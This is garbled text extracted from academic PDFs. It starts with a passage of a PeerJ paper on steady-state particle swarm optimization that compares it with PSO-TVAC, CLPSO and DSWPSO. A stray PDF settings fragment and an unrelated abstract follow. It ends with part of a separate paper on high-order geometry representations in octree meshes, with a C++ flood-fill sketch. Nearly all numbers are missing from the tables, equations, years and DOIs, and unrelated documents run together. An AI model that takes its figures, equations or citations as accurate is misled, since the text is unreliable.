please remember that we are not trying to find the best set of parameters for each function. the most important conclusions here is that ss-pso does not seem to be more sensitive to the parameters than s-pso, displaying similar patterns when varying v, c and c and m, and that the performance enhancement brought by ss-pso is observed on a reasonably wide range of parameter values. time-varying parameters an alternative approach to parameter tuning is to let the parameters values change during the run, according to deterministic or adaptive rules. in order to avoid tuning effort and adapt the balance between local and global search to the search stage, shi & eberhart ( ) proposed a linearly time-varying inertia weight: starting with an initial and pre-defined value, the parameter value decreases linearly with time, until it reaches the minimum value. the variation rule is given by eq. ( ): v tð Þ ¼ v � v ð Þ � max t � tð Þ max t þ v ( ) where t is the current iteration, max_t is the maximum number of iterations, v the inertia weigh initial value and v its final value. (a) k = (b) k = (c) k = = μ figure regular graphs with population size μ = and k = (a), k = (b) and k = = μ (c). full-size doi: . /peerj-cs. /fig- a b k = k = k = k = k = k = k = k = su cc es sf ul ru ns f f f f f f f f f f k = k = k = k = k = k = k = k = fit ne ss e va lu a� on s f f f f f f f f f f figure ss-pso with different topologies. (a) success rates. (b) mean fitness evaluations to a solution. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ later, ratnaweera, halgamuge & watson ( ) tried to improve shi and eberhart’s pso with time-varying inertia weight (pso-tviw) using a similar concept applied to the acceleration coefficients. in the pso with time-varying acceleration coefficients pso (pso-tvac) the parameters c and c change during the run according to the following equations: c ¼ c f � c i � � � t max t þ c i ( ) c ¼ c f � c i � � � t max t þ c i ( ) where c i, c f, c i, c f are the acceleration coefficients initial and final values. the experiments in this section compare pso-tvac with ss-pso-tvac (i.e., pso- tvac with the steady-state update strategy). parameters v and v were set to . and . . the acceleration coefficient c initial and final values were set to . and . and c ranges from . to . , as suggested by ratnaweera, halgamuge & watson ( ). the results are in table (pso-tvac) and table (ss-pso-tvac). table compares the algorithms using mann–whitney tests. ss-pso-tvac improves pso-tvac in every unimodal function in terms of accuracy and convergence speed and it is significantly faster in functions f , f , f and f while attaining similar results. pso-tvac only outperforms ss-pso-tvac in the noisy f function. these results show that the steady state version of pso-tvac is able to improve the convergence speed of the original algorithm in several types of fitness landscapes. furthermore, ss-pso-tvac achieves more accurate solutions in the unimodal problems. comprehensive learning pso the following experiment aims at comparing the proposed ss-pso with the clpso (liang et al., ; lynn & suganthan, ). clpso uses an alternative velocity updating equation: vi;d tð Þ ¼ v � vi;d t � ð Þ þ c � r � pfi dð Þ;d � xi;d t � ð Þ � � ( ) table pso-tvac results. fitness evaluations sr median min max median min max f . e- . e- . e- , , , f . 
e- . e- . e , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e . e- , , , note: medians are shown in bold if pso-tvac provides similar or better results than ss-pso-tvac (table ). fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where fi ! ¼ fi ð Þ; fi ð Þ; . . . fi dð Þð Þ defines which particle’s best solutions particle i should follow. hence, the term pfi(d),d can refer to the corresponding dimension of any particle’s best found solution so far. the decision depends on a probability pc, different for each particle and computed a priori. following the guidelines and parameters in liang et al. ( ), clpso and ss-clpso have been implemented and tested in the set of benchmark functions. comprehensive-learning pso performance is strongly dependent on the refreshing gap parameter m, which defines the number of generations during which the particles are allowed to learn from fi without improving their fitness. after m generations without fitness improvement, fi is reassigned. in order to make fair comparisons, parameter m was first optimized for each function. the other parameters were set as in liang et al. ( ). then, ss-clpso was tuned using the same parameter setting as the corresponding clpso. the results are in tables and and statistical analysis is in table . on the one hand, the results show that, in general, a steady-state strategy applied to clpso does not improve the performance of the algorithm. on the other hand, ss-clpso does not degrade the general behavior of clpso. please note that clpso does not use a traditional topology. in this case, to construct ss-clpso, we use a moore neighborhood to decide which particles to update along with the least fit individuals, but, unlike ss-pso or ss-pso-tvac, the structure does not define the information flow within the swarm. table ss-pso-tvac results. fitness evaluations sr median min max median min max f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e+ . e . e+ , , , f . e . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e . e . e- , , , note: medians are shown in bold if ss-pso-tvac provides similar or better results than pso-tvac (table ). table comparing ss-pso-tvac and pso-tvac with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ ≈ ≈ ≈ ≈ evaluations + + + ≈ ≈ + + + - + notes: +if ss-pso-tvac ranks first in the mann–whitney test and the result is significant. -if pso-tvac ranks first and the results is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since neighboring particles communicate and use each other’s information, they tend to travel through similar regions of the landscape, but in clpos there is not necessarily a relationship between the particles in the set and this clustering behavior is not present. for a steady-state strategy to take full advantage of the clpso dynamic network, maybe it table clpso results. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e- – – – – f . e- . e- . e- , , , f . e . e . e+ , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e – – – – f . e . e . 
e- , , , note: medians are shown in bold if clpso provides similar or better results than ss-clpso (table ). table ss-clpso results. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e – – – – f . e- . e- . e- , , , f . e+ . e . e+ , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e – – – – f . e . e . e- , , , note: medians are shown in bold if ss-clpso provides similar or better results than clpso (table ). table comparing ss-pso and clpso with the mann-whitney test. f f f f f f f f f f fitness ≈ ≈ ≈ ≈ ≈ ≈ - ≈ ≈ ≈ eval. ≈ – ≈ - + ≈ + - – + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if clpso ranks first and the results is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is necessary to define a dynamic update strategy which takes into account the current set of particles from which an individual is learning at a specific period of the run. steady-state updates strategies for pso in dynamic networks is planned as future work. dynamic small world pso the final experiment compares ss-pso with the dswpso, recently proposed by vora & mirlanalinee ( ). dswpso uses a static von neumann topology to which a number of random connections are added in each iteration. it is a very simple variation of the standard pso, but it attains quite interesting results when compared to a number of state-of-the-art psos. for this paper, dswpso was tested with von neumann and moore topologies. the number of random neighbors in each topology was set to , as suggested by vora & mirlanalinee ( ). parameters c and c were set to . and v to . . the algorithms were all run for , function evaluations. dswpso results are table dswpso with von neumann neighborhood and two random neighbors. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e+ , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e+ . e+ . e- , . , , f . e+ . e+ . e- , , , f . e- . e+ . e+ , , , f . e- . e- . e+ , , , f . e- . e- . e+ , , , f . e- . e+ . e- , , , table dswpso with moore neighborhood and two random neighbors. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e+ , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e- . e+ . e- , . , , f . e+ . e+ . e- , , , f . e- . e+ . e+ , , , f . e- . e- . e+ , , , f . e- . e- . e+ , , , f . e- . e+ . e+ , , , fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ presented in table (von neumann) and table (moore). the statistical analysis that compares ss-pso and dswpso are in table (von neumann) and table (moore). it is clear that ss-pso outperforms dswpso with both von neumann and moore base-topology in most of the functions, not only in terms of convergence speed, but also in solution quality. figure shows the convergence curves (median best fitness values over runs) of s-pso, ss-pso and dswpso (von neumann). the graphics show that ss-pso converges faster to the vicinity of the solutions. furthermore, and although it is not perceivable in the graphics, ss-pso eventually reaches solutions closer to f(x) = (the optimum of both functions) as demonstrated by tables and . running times a final experiment compares s-pso and ss-pso running times. 
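the dynamic small world variant described above leaves the pso update untouched and only changes the neighborhood: a static von neumann (or moore) lattice is augmented with a few random links that are redrawn in every iteration. a minimal sketch of that neighborhood construction is given below; the helper names and the wrap-around lattice are illustrative assumptions, not taken from the original dswpso implementation.

import numpy as np

def von_neumann(rows, cols):
    # static 2-d lattice with wrap-around: each particle is linked to its
    # four orthogonal neighbors (the von neumann neighborhood) and itself
    neigh = []
    for r in range(rows):
        for c in range(cols):
            neigh.append({r * cols + c,
                          ((r - 1) % rows) * cols + c,
                          ((r + 1) % rows) * cols + c,
                          r * cols + (c - 1) % cols,
                          r * cols + (c + 1) % cols})
    return neigh

def dynamic_small_world(static_neigh, n_random, rng):
    # dswpso-style neighborhood for one iteration: the static lattice plus
    # n_random extra links per particle, redrawn anew every iteration
    mu = len(static_neigh)
    return [base | {int(j) for j in rng.choice(mu, size=n_random, replace=False)}
            for base in static_neigh]

rng = np.random.default_rng(0)
lattice = von_neumann(4, 4)
print(sorted(dynamic_small_world(lattice, 2, rng)[0]))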
the algorithms are run on function f with d set to , , and . moore neighborhood is used in both table comparing ss-pso and dswpso (von neumann) with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ + + + + + eval. + + + + + + + + ≈ + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if dswpso ranks first and the results is significant. ≈if the differences are not significant. table comparing ss-pso and dswpso (moore) with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ + + + + eval. + + + + + ≈ + + ≈ + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if dswpso ranks first and the results is significant. ≈if the differences are not significant. . . . . fit ne ss func�on evalua�ons (a) sphere (f ) s-pso ss-pso dswpso . . . . fit ne ss func�on evalua�ons (b) weierstrass (f ) s-pso ss-pso dswpso figure s-pso, ss-pso and dswpso best fitness curves for the sphere (a) and weierstrass (b) benchmark functions. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithms and parameters are set as in previous experiments. figure shows the running times of , functions evaluations (median values over runs for each algorithm). the running times of each algorithm are statistically equivalent for every d value. running times of ss-pso with von neumann and moore neighborhood are also equivalent. the perfandpubtools software (fachada et al., ) was used to analyze the running times. discussion the experiments in the previous sections demonstrate that ss-pso is able to significantly improve the performance of the standard pso, at least on the set of benchmark functions. the differences are particularly noticeable in the convergence speed of the algorithms, but ss-pso is also able to improve the solution quality in several functions (see table ). an experiment comparing three different steady-state strategies show that replacing the worst particle and its neighbors is the best strategy. our initial hypothesis (reducing the number of evaluations in each time step, while focusing only on the worst solutions, reduces the computational effort to reach a solution) is confirmed. the relative performance of ss-pso and standard pso has also been verified for a wide range of parameter values (see figs. – ) as well as for different problem dimensions (see fig. ). these results are important since they demonstrate that the proposed strategy has not been fine-tuned and that its validity is not restricted to a particular region of the parameter space or problem dimension. the algorithm was also compared to a pso with time-varying acceleration, again attaining good results, thus reinforcing the idea that the steady-state strategy is consistent and robust. ss-pso was compared to clpso, and while being outperformed in terms of solution quality in four functions, it yields better solutions in two problems, and is faster in other two functions. since clpso is considered to be a very efficient algorithm, these results are promising. it deserves further examination whether variants of ss-pso could clearly outperform clpso. finally, ss-pso was compared to dswpso with excellent results. d = d = d = d = t( s) s-pso ss-pso figure s-pso and ss-pso running times. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
/peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions this paper investigates the performance of a new and unconventional updated strategy for the pso. the ss-pso is inspired by the bak–sneppen model of coevolution. however, while in the bak–sneppen model the worst individual and its neighbors are replaced by random values, in ss-pso the worst particle and its neighbors are updated and evaluated in each time step. the remaining particles are kept in a steady state until they eventually satisfy the update criterion. due to its strategy, ss-pso may be classified within the a-psos category. however, its working mechanisms are radically different from standard a-psos. after preliminary tests that determined the best topology for a set of ten unimodal, multimodal, shifted, noisy and rotated benchmark problems, the strategy was implemented on the winning structure: two-dimensional lattice with moore neighborhood. quality of solutions, convergence speed and success rates were compared and statistical analyses were conducted on the results. ss-pso significantly improved the performance of a standard s-pso in every function, at least in one of the two criteria (quality of final solutions and convergence speed). a parameter sensitivity analysis showed that ss-pso is not more sensitive to the variation of parameter values than s-pso. a scalability test showed that the proposed strategy does not introduce scalability difficulties. the algorithm was compared to pso-tva, clpso and dswpso with good results. the first step in future works is to increase the size of the test with more functions, hoping that an extended test set can improve our insight into the behavior of the algorithm. the emergent properties of the algorithm (size of events, duration of stasis, critical values) will be also studied and compared to those of the bak–sneppen model. finally, steady-state update strategies in dynamic topologies will be investigated. additional information and declarations funding this work was supported by fundação para a ciência e tecnologia (fct) research fellowship sfrh/bpd/ / and fct project (uid/eea/ / ), ephemech (tin - -c - -p, spanish ministry of economy and competitivity), proy-pp - (plan propio ugr), project cei -mp-v of the microprojects program from cei biotic granada. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fundação para a ciência e tecnologia (fct), research fellowship: sfrh/bpd/ / . fct project: uid/eea/ / . ephemech: tin - -c - -p, spanish ministry of economy and competitivity. proy-pp - : plan propio ugr. cei -mp-v of the microprojects program from cei biotic granada. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � carlos m. fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. 
� nuno fachada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � juan-julián merelo authored or reviewed drafts of the paper, approved the final draft. � agostinho c. rosa authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/laseeb/openpso. references allmendiger r, li x, branke j. . reference point-based particle swarm optimization using a steady-state approach, seal . lecture notes in computer science : – doi . / - - - - _ . aziz nab, mubin m, mohamad ms, aziz ka. . a synchronous-asynchronous particle swarm optimisation algorithm. scientific world journal : doi . / / . baillieul j, samad t. . encyclopedia of systems and control. london: springer-verlag. bak p. . how nature works. new york: springer-verlag, . bak p, sneppen k. . punctuated equilibrium and criticality in a simple model of evolution. physical review letters ( ): – doi . /physrevlett. . . bak p, tang c, wiesenfeld k. . self-organized criticality: an explanation of /f noise. physical review letters ( ): – doi . /physrevlett. . . boettcher s, percus ag. . optimization with extremal dynamics. complexity ( ): – . carlisle a, dozier g. . an off-the-shelf pso. in: proceeding of workshop on particle swarm optimization, indianapolis, purdue school of engineering and technology, iupui, indianapolis, in, usa. vol. , – . engelbrecht ap. . particle swarm optimization: iteration strategies revisited. in: brics congress on computational intelligence and th brazilian congress on computational intelligence, recife, brazil. – . fachada n, lopes vv, martins rc, rosa ac. . perfandpubtools—tools for software performance analysis and publishing of results. journal of open research software ( ):e doi . /jors. . fernandes cm, fachada n, laredo j, merelo j, castillo p, rosa ac. . revisiting population structure and particle swarm performance. in: proceedings of the th international joint conference on computational intelligence—volume , seville. – . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/laseeb/openpso http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / / http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /jors. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fernandes cm, laredo jlj, merelo jj, cotta c, rosa ac. . particle swarms with dynamic topologies and conservation of function evaluations. in: proceedings of the international joint conference on computational intelligence, rome, italy. – doi . / . fernandes cm, merelo jj, rosa ac. . an asynchronous and steady state update strategy for the particle swarm optimization algorithm. in: proceedings of parallel problem solving from nature—ppsn xiv, edimburgh, scotland. berlin: springer, – . gutenberg b, richter cf. . magnitude and energy of earthquakes. annali di geofisica : – doi . /ag- . kennedy j, eberhart r. . particle swarm optimization. in: proceedings of ieee international conference on neural networks, perth, autralia. vol. , – doi . /icnn. . . kennedy j, mendes r. . population structure and particle swarm performance. in: proceedings of the ieee world congress on evolutionary computation, honolulu, hawaii, usa. – . liang jj, qin ak, suganthan pn, baskar s. . 
comprehensive learning particle swarm optimizer for global optimization of multimodal functions. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . liu c, du w-b, wang w-x. . particle swarm optimization with scale-free interactions. plos one ( ):e doi . /journal.pone. . løvbjerg m, krink t. . extending particle swarm optimizers with self-organized criticality. in: proceedings of the ieee congress on evolutionary computation, honolulu, hawaii, usa. vol. . ieee computer society. – . lynn n, suganthan pn. . heterogeneous comprehensive learning particle swarm optimization with enhanced exploration and exploitation. swarm and evolutionary computation : – doi . /j.swevo. . . . majercik s. . green-pso: conserving function evaluations in particle swarm optimization. in: proceedings of the ijcci , vilamoura, portugal. – . mcnabb a. . serial pso results are irrelevant in a multi-core parallel world. in: proceedings of the ieee congress on evolutionary computation, beijing, china. – . rada-vilela j, zhang m, seah w. . a performance study on synchronous and asynchrounous updates in particle swarm. soft computing ( ): – doi . / . . ratnaweera a, halgamuge s, watson h. . self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . shi y, eberhart rc. . empirical study of particle swarm optimization. in: proceedings of ieee international congress on evolutionary computation, washington, dc, usa. vol. , – doi . /cec. . . vora m, mirlanalinee tt. . dynamic small world particle swarm optimizer for function optimization. natural computing ( ): – doi . /s - - - . whitley d, kauth j. . genitor: a different genetic algorithm. in: proceedings of the rocky mountain conference on artificial intelligence, denver, co, usa. – . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /ag- http://dx.doi.org/ . /icnn. . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.swevo. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /cec. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steady state particle swarm introduction materials and methods results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . 
[pdf] digital scientific notations as a human-computer interface in computer-aided research. k. hinsen, peerj preprints, doi . /peerj.preprints. v . abstract: most of today's scientific research relies on computers and software not only for administrational tasks, but also for processing scientific information. examples of such computer-aided research are the analysis of experimental data or the simulation of phenomena based on theoretical models. with the rapid increase of computational power, scientific software has integrated more and more complex scientific knowledge in a black-box fashion. as a consequence, its users do not know, and don't even…
generation of high order geometry representations in octree meshes submitted july accepted november published november corresponding author harald g. klimach, harald.klimach@uni-siegen.de, harald@klimachs.de academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright klimach et al. distributed under creative commons cc-by . open access generation of high order geometry representations in octree meshes harald g. klimach, jens zudrop and sabine p. roller maschinenbau, university of siegen, siegen, germany abstract we propose a robust method to convert triangulated surface data into polynomial volume data. such polynomial representations are required for high-order partial differential solvers, as low-order surface representations would diminish the accuracy of their solution. our proposed method deploys a first-order spatial bisection algorithm to robustly find an approximation of given geometries. the resulting voxelization is then used to generate legendre polynomials of arbitrary degree. by embedding the locally defined polynomials in cubical elements of a coarser mesh, this method can reliably approximate even complex structures, like porous media. it is thereby possible to provide appropriate material definitions for high-order discontinuous galerkin schemes. we describe the method to construct the polynomial and how it fits into the overall mesh generation. our discussion includes numerical properties of the method, and we show some results from applying it to various geometries. we have implemented the described method in our mesh generator seeder, which is publicly available under a permissive open-source license. subjects computer aided design, scientific computing and simulation keywords polynomial approximation, discontinuous galerkin, mesh generation, high-order introduction high-order approximations are attractive for numerical simulations on modern computing systems due to their fast error convergence. they can solve complex problems accurately with few degrees of freedom and, therefore, low memory consumption. this is an important property, as memory is an expensive resource in today's computing systems. the discontinuous galerkin finite element method (dgfem) is a relatively recent numerical scheme, gaining attraction in a wide range of application domains. an introduction and overview is offered by hesthaven & warburton ( ). besides the possibility to use high-order approximations, the local basis definition in dgfem nicely fits the demands of massively parallel and distributed computing systems. thus, a high-order dgfem discretization is a good candidate to solve large-scale problems. however, one drawback of high-order methods is the need for appropriate descriptions of geometrical setups in the simulation with the same approximation accuracy as the numerical scheme. we present a method to obtain such a description for inhomogeneous material distributions. specifically, we consider non-smooth distributions, with a clear interface between distinct material properties.
such variations in material parameters appear for example in the field of electrodynamics, and we will use a simple scattering by a cylindrical object to highlight the application of the generated material in a dgfem solver. electrodynamics is governed by maxwell's equations, and with an isotropic, linear material they read:

∇ · (εe) = ρ_e (1)
∇ · b = 0 (2)
∂b/∂t + ∇ × e = 0 (3)
∂(εe)/∂t − ∇ × (b/µ) = −j. (4)

gauss's law (1) states a direct relation between the divergence of the electrical field e and the electrical charge density ρ_e. similarly, the magnetic field b has to be divergence free as there are no magnetic charges, which is expressed in (2). the two fields evolve in time according to faraday's law (3) and ampère's law (4). in these equations, the environment is described by the permittivity ε and permeability µ of the present materials. our goal is the conversion of surface descriptions that separate regions of different materials into functions of space ε(x,y,z) and µ(x,y,z). though we will only consider maxwell's equations in this work, the method is generic and can be used for any partial differential equation with spatially varying material parameters. we consider here a dgfem with polynomial basis functions and, therefore, generate polynomial representations locally in each element.

geometry identification is tightly related to mesh generation. therefore, we integrated this method into our meshing tool seeder (klimach et al., ), which is freely available under an open-source licence. seeder creates meshes with cubical elements based on an octree refinement towards boundaries. it uses stl (white, ) files to describe boundary surfaces of arbitrary complexity. with the method we present here, the cubical elements can now be equipped with additional information to provide the spatial distribution of materials within the cubical elements. the fundamental idea to obtain high-order polynomial representations is the use of a simple first-order voxelization within the coarse elements of the mesh for the dgfem solver. this volume information can then be translated into polynomials by a suitable transformation method. a major feature of the first-order method is its robustness, which allows the treatment of complex setups. a drawback is its low accuracy and need for a large number of voxels. however, this is alleviated by using the octree strategy of recursive refinement. it thereby becomes feasible to generate accurate polynomials of high order for arbitrary surfaces.

related work

our approach is most closely related to embedded boundaries, as used in spectral discretizations. examples of such approaches are the spectral smoothed boundary method (bueno-orovio, pérez-garcía & fenton, ) and the fourier spectral embedded boundaries (sabetghadam, sharafatmandjoor & norouzi, ). these methods rely on a representation of the irregular domain by a function.
this function, also referred to as phase-field, is usually constructed with the help of a global rectangular cartesian grid. we extend this concept with an octree mesh, where we apply this method in each of the elements of the mesh. the constructed geometry representation is then defined locally within each mesh cell. this matches the function space of the dgfem and can be directly used by dgfem solvers. within the elements, we also make use of the octree bisection algorithm to achieve a fast voxelization of surfaces. in comparison to a global rectangular domain in spectral methods, the composition of multiple elements in a mesh allows for a greater flexibility in the definition of the embedding domain. by fitting the embedding domain to the actual computational domain of interest, the computational effort can be minimized in this approach.

other methods, where irregular meshes are deployed with an internal geometry representation, are typically referred to as immersed boundary methods. introduced by peskin ( ) for elastic walls in incompressible flows, this approach has been improved and extended since by various authors. an overview of these methods is for example provided by mittal & iaccarino ( ). similarly to the strategy we follow here, these methods make use of meshes for the computational domain. however, they rely on surface representations to describe objects within the meshes and directly enforce boundary conditions on these. they are popular for flows with moving geometries but do not provide a direct method to describe varying materials, like the change in permeability and permittivity in electrodynamics. in contrast to the embedded boundaries in spectral methods, the immersed boundaries are usually employed in lower order schemes. our goal is the generation of material representations for high-order dgfem solvers. as such, we need a mesh like in the immersed boundary methods, but a high-order functional representation of the geometry as in the embedded boundary methods. this method enables the exploitation of the fast convergence of spectral approximations but still allows for complex computational domains.

the traditional approach to boundaries in unstructured, irregular meshes is the fitting of the mesh to the geometry. here, a high order can be obtained by deforming the elements with curved surfaces. hindenlang, bolemann & munz ( ) offer a method in this direction specifically designed for discontinuous galerkin discretizations. however, the identification of such curved boundaries is much more complex and usually not used for internal interfaces like material changes, as both sides of the interface need to be considered. such deformed, unstructured elements are also subject to varying mesh quality and prone to issues with geometrical constraints. as we will show, the embedding description of materials provides a viable and robust alternative to the body fitting of meshes. it comes at the cost of volumetric information that needs to be stored but avoids the need for expensive transformations during the simulation.

the seeder mesh generator

seeder (harlacher et al., ) is an octree mesh generator. it produces voxelizations of complex geometries defined by surface triangulations in the form of stl files.

figure illustration of the voxelization of a sphere within coarse mesh elements.
the sphere is indicated by the yellow surface while the thick black lines outline the elements of the actual mesh. the voxelization within elements follows the octree refinement towards the sphere and is indicated by the thinner white lines. inside the sphere, voxels have been colorized by the flood-fill mechanism with a seed in the center. flooded elements are shown in red; other elements are blue.

some geometric primitives, like spheres and cylinders, are also available, and we will make use of them in the examples considered here. by voxelization, we refer to the process of subdividing a given volume into smaller cubical elements (voxels) in three-dimensional space. with the octree approach, these cubical elements are successively split into smaller cubes, where needed. an example for the voxelization of a sphere is shown in fig. . the yellow surface indicates the sphere and the red color indicates the voxels completely inside the sphere. note how the voxels build a staircase that approximates the smooth surface. also, the octree refinement is visible in fig. . our concept of voxels does not imply equally sized voxels. instead, as outlined by the white lines, different voxel sizes arise from the bisection rule of the octree approach. thus, we only need to create a large number of small voxels close to the smooth surface while covering the rest of the volume with just a few large ones. the mesh format generated by seeder exploits the topology information from the octree and is designed for parallel processing on distributed, parallel systems. seeder is freely available online (klimach et al., ) under a permissive bsd license and has been successfully compiled and run on many computing architectures. in the following section, the general voxelization method is briefly outlined. afterward, we explain the extensions that enable high-order material definitions within the mesh elements.

basic mesh generation procedure

to produce the voxelization, seeder deploys an approach similar to the building cube method by ishida, takahashi & nakahashi ( ). the basic idea is an iterative refinement towards geometry surfaces, followed by a flooding of the computational domain starting from a user defined seed. this flooding is limited by elements intersected by boundary objects, and all flooded elements finally constitute the actual computational domain. for the refinement, a bisection in each direction is used in each step, resulting in an octree mesh. such tree structures are well established and widespread in mesh generators to identify and sort geometrical objects fast; see for example yerry & shephard ( ) for an early adoption. in seeder, each geometry has some refinement level, defined by the user, attached to it. this level describes how many bisection steps should be done to resolve the surface. the higher this level, the smaller the voxels used to approximate the surface. elements are refined iteratively if they intersect a geometry, until the desired resolution is reached. after this step of boundary identification, the actual computational domain is identified by a 3d flood filling algorithm. all elements intersected by a geometry bound this flooding. to avoid unintentional spills, the flooding only considers the six face neighbors (von neumann neighborhood). a minimal sketch of such a neighbor-limited flood fill is given below.
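the following c++ fragment is an illustrative sketch only: a uniform voxel grid stands in for the octree leaves, and the type and function names (VoxelGrid, floodFill, and so on) are ours, not seeder's.

#include <array>
#include <queue>
#include <vector>

struct VoxelGrid {
    int nx, ny, nz;                    // voxels per direction
    std::vector<bool> intersected;     // true if a boundary surface cuts this voxel (size nx*ny*nz)
    std::vector<bool> flooded;         // filled by the flood fill below (size nx*ny*nz)
    int idx(int x, int y, int z) const { return (z * ny + y) * nx + x; }
};

// flood the domain from a user-defined seed, spreading only over the six face
// neighbours (von neumann neighbourhood) and stopping at intersected voxels.
void floodFill(VoxelGrid& g, int sx, int sy, int sz) {
    std::queue<std::array<int, 3>> open;
    open.push({sx, sy, sz});
    g.flooded[g.idx(sx, sy, sz)] = true;
    const int step[6][3] = {{1,0,0},{-1,0,0},{0,1,0},{0,-1,0},{0,0,1},{0,0,-1}};
    while (!open.empty()) {
        auto [x, y, z] = open.front();
        open.pop();
        for (const auto& d : step) {
            int xx = x + d[0], yy = y + d[1], zz = z + d[2];
            if (xx < 0 || yy < 0 || zz < 0 || xx >= g.nx || yy >= g.ny || zz >= g.nz) continue;
            int i = g.idx(xx, yy, zz);
            if (g.flooded[i] || g.intersected[i]) continue;   // boundaries confine the flooding
            g.flooded[i] = true;
            open.push({xx, yy, zz});
        }
    }
}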
this mechanism, even though it requires the definition of seeds by the user, is chosen as it provides a high robustness and indifference towards the triangle definitions in stl files. small inaccuracies in the geometry definition are automatically healed, as long as they are below the resolution of the voxelization. this approach has proven to be robust and applicable to a wide range of complex geometries.

generation of the polynomial geometry approximation

the cubical elements obtained by the mesh generation procedure described in the previous section provide the frame wherein we can now construct the high-order surface representation. we want this representation in the function space of the dgfem solver, which often consists of polynomials, and in our solver specifically of legendre polynomials. legendre polynomials build an orthogonal basis with respect to a weight of one on the interval [−1, 1], and they adhere to the three-term recurrence relation

l_i(x) = ((2i − 1)/i) x l_{i−1}(x) − ((i − 1)/i) l_{i−2}(x). (5)

with l_0(x) = 1 and l_1(x) = x, the higher order polynomials can be recursively computed by (5). the first legendre polynomial l_0(x) = 1 is the only one with a non-vanishing integral mean; all higher ones are mean free on the interval [−1, 1]. for material interfaces we usually need to deal with discontinuities, as the material property jumps at the interfaces. thus, we need to project a step function

Ξ(x) = 0 if x ≤ ξ, 1 if x > ξ (6)

onto our polynomial space and find a suitable expansion

p_n(x) = Σ_{i=0}^{n} a_i l_i(x) (7)

that approximates (6). in fig. such a discontinuity at a jump location ξ is shown along with its approximation p_n(x) from (7) with various maximal degrees n. while in this simple 1d example the projection can be computed analytically, this is not possible anymore for higher dimensions with arbitrary jump definitions. we, therefore, introduce an algorithm in this section to find approximations of the projection numerically.

figure projection of a step function (6), jumping at a location ξ, onto the space of legendre polynomials. shown is the step function along with its approximation by more and more legendre basis functions obtained by analytical integration.

